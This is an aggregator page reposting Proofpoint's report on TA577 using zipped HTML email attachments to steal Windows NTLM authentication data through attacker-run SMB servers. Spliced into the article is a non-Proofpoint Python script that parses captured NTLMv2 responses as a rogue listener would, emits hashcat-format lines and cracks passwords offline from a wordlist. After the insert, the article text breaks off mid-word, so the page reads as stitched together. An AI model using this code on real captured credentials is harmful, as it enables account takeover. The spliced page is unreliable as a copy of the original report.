One Article Review

Home - The article:
Source ProofPoint
Identifier 8470829
Publication date 2024-03-26 06:00:09 (viewed: 2024-03-26 16:08:13)
Title Proofpoint Discloses Technique Pivot by Attacker Group TA577: Targeting Windows NTLM
Text Proofpoint was the first to uncover a concerning new development in the world of cyberthreats involving a group known as TA577. These cybercriminals, who typically act as initial access brokers (IABs), have pivoted to attacking an old but widely deployed Windows service to steal sensitive information. Specifically, they aim to steal NT LAN Manager (NTLM) authentication session details at scale. They are then expected either to sell the data or to exploit it for downstream activities such as stealing sensitive data and ransoming systems. The planned end result is the same: a significant business-impacting breach of the targeted organizations.

How did the new attack happen?

Proofpoint detected two distinct email-based campaigns that TA577 carried out on February 26 and 27, 2024. The campaigns targeted hundreds of businesses globally via tens of thousands of emails.

The attackers disguised the emails as replies to previous emails, an effective social engineering tactic known as thread hijacking.

The emails contained HTML attachments compressed into zip files. Each malicious attachment had its own unique identifier, and the HTML file inside each archive was customized for its recipient. Because every file hash was unique, a simple signature-based detection system could not consistently detect and block these emails.

When the recipient opened the file, it triggered a connection to a Server Message Block (SMB) server controlled by the threat actor. No malware was delivered over these connections. The attackers' objective was clear: to capture the details of the NTLM challenge/response transaction from the user's Windows machine, which is derived from the user's password hash. The attackers can use this data in the next stage of the attack either in hash form or by first cracking the hash to recover the password.
Note: In this case, multifactor authentication (MFA) would not stop the attack, because TA577 targeted users already authenticated on active Windows machines. Any MFA step had already occurred, so it does not significantly hinder this attack.

What was the attackers' intent?

As noted earlier, TA577 usually acts as an IAB. The group likely aimed to exploit the collected data by cracking the password hashes or facilitating "pass-the-hash" attacks, and then to sell access to other threat actors who want to penetrate the targeted companies' networks more deeply.

As part of its investigation, Proofpoint identified the use of a well-known toolkit, Impacket, on the SMB servers involved in the attack. This discovery further confirmed that TA577's intent goes well beyond the initial account or system compromise.

What is especially concerning about this approach is that any connection to the SMB servers compromises sensitive information, including usernames, passwords, session hashes, domain names and computer names. More troubling, the attackers delivered the malicious HTML files inside zip archives, which bypassed protections in Outlook mail clients last patched before July 2023. If your email security provider did not block the inbound email and a user engaged with the message, your last hope of avoiding compromise is the timeliness of your software patching program.

The impacts on businesses

This attack relies on an old protocol (NTLM) from the 1990s. But this new twist by TA577 is noteworthy because it represents a departure from the group's usual tactic of delivering malware and bots directly. It suggests that the group is adapting and evolving, seeking new ways to bypass security measures and monetize its campaigns.
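The challenge/response capture described above, and the offline cracking it enables, as an added worked example (this is not Proofpoint's code and not TA577's tooling; the user jdoe, domain CORP, workstation WS01, the password Spring2024! and every challenge and timestamp value are invented). It builds the NTLMSSP Type 3 message a Windows client sends when it authenticates to an attacker-controlled SMB share, parses it the way a rogue listener would, prints the hashcat/john NetNTLMv2 line, and recovers the password from a small wordlist. Everything after the capture happens offline, so neither MFA nor a domain controller is involved, which is the point of the note above.

```python
"""NTLMv2 capture and offline cracking (added example; not Proofpoint's or TA577's code).
Builds a constructed NTLMSSP AUTHENTICATE_MESSAGE (Type 3), parses it like a rogue SMB
listener, emits the NetNTLMv2 line and cracks it. All names, secrets and bytes are invented."""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; hashlib's md4 is often disabled under OpenSSL 3."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for f, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a = rol((a + f(b, c, d) + X[j] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next step updates the next word
        a, b, c, d = [(x + y) & 0xFFFFFFFF for x, y in zip((a, b, c, d), (aa, bb, cc, dd))]
    return struct.pack("<4I", a, b, c, d)


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP): HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    nt_hash = md4(password.encode("utf-16le"))
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: the only password-dependent bytes the rogue server ever receives."""
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def build_authenticate(user: str, domain: str, workstation: str, nt_response: bytes) -> bytes:
    """Type 3 layout: 88-byte header (six field descriptors, flags, Version, MIC) + payload."""
    fields, payload = [], b""
    for item in (b"", nt_response, domain.encode("utf-16le"),
                 user.encode("utf-16le"), workstation.encode("utf-16le"), b""):
        fields.append(struct.pack("<HHI", len(item), len(item), 88 + len(payload)))
        payload += item
    flags = 0xE2888215  # invented flag word; the parser below does not interpret it
    return (b"NTLMSSP\x00" + struct.pack("<I", 3) + b"".join(fields)
            + struct.pack("<I", flags) + bytes(8) + bytes(16) + payload)


def parse_authenticate(msg: bytes) -> dict:
    """What a rogue SMB server extracts from the client's Type 3 (no password needed)."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE_MESSAGE")

    def field(off: int) -> bytes:  # descriptor: Len(u16) MaxLen(u16) Offset(u32)
        ln, _, pos = struct.unpack_from("<HHI", msg, off)
        return msg[pos:pos + ln]

    nt_resp = field(20)
    return {"domain": field(28).decode("utf-16le"), "user": field(36).decode("utf-16le"),
            "workstation": field(44).decode("utf-16le"),
            "nt_proof": nt_resp[:16], "blob": nt_resp[16:]}


def netntlmv2_line(p: dict, server_challenge: bytes) -> str:
    """hashcat -m 5600 / john netntlmv2 format: USER::DOMAIN:challenge:NTProofStr:blob."""
    return f'{p["user"]}::{p["domain"]}:{server_challenge.hex()}:{p["nt_proof"].hex()}:{p["blob"].hex()}'


def crack(p: dict, server_challenge: bytes, wordlist):
    """Offline guessing: no further contact with the victim or any domain controller."""
    for candidate in wordlist:
        key = ntlmv2_key(candidate, p["user"], p["domain"])
        if hmac.compare_digest(nt_proof(key, server_challenge, p["blob"]), p["nt_proof"]):
            return candidate
    return None


def simulate_capture():
    """Constructed exchange: the listener's own Type 2 challenge and the victim's Type 3."""
    server_challenge = bytes.fromhex("1122334455667788")    # invented; chosen by the listener
    client_challenge = bytes.fromhex("99aabbccddeeff00")    # invented
    timestamp = struct.pack("<Q", 133_540_000_000_000_000)  # FILETIME, invented
    target_info = struct.pack("<HH", 2, 8) + "CORP".encode("utf-16le") + bytes(4)  # NbDomain + EOL
    blob = (b"\x01\x01" + bytes(6) + timestamp + client_challenge + bytes(4)
            + target_info + bytes(4))
    key = ntlmv2_key("Spring2024!", "jdoe", "CORP")  # the victim's invented credentials
    nt_response = nt_proof(key, server_challenge, blob) + blob
    return server_challenge, build_authenticate("jdoe", "CORP", "WS01", nt_response)


if __name__ == "__main__":
    challenge, type3 = simulate_capture()
    parsed = parse_authenticate(type3)
    print(netntlmv2_line(parsed, challenge))
    print("cracked:", crack(parsed, challenge, ["password", "Winter2023", "Spring2024!"]))
```

The listener needs nothing but the bytes on the wire plus the challenge it picked itself, which is why a single unsolicited SMB connection from an already logged-in workstation is enough; Impacket's smbserver.py, from the toolkit Proofpoint saw on the attackers' servers, records exactly these fields in this format. The capture is only as strong as the password behind it, so long, unique passwords and blocking outbound SMB to the internet remove the offline-cracking step that MFA cannot.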
This cyberthreat poses a significant risk to businesses that run Microsoft Windows. Through the theft of NTLM authenti
Sent Yes
Tags Malware Threat Patching
Stories
Rating ★★★


The article does not appear to have been picked up after its publication.


The article does not appear to have been picked up from an earlier one.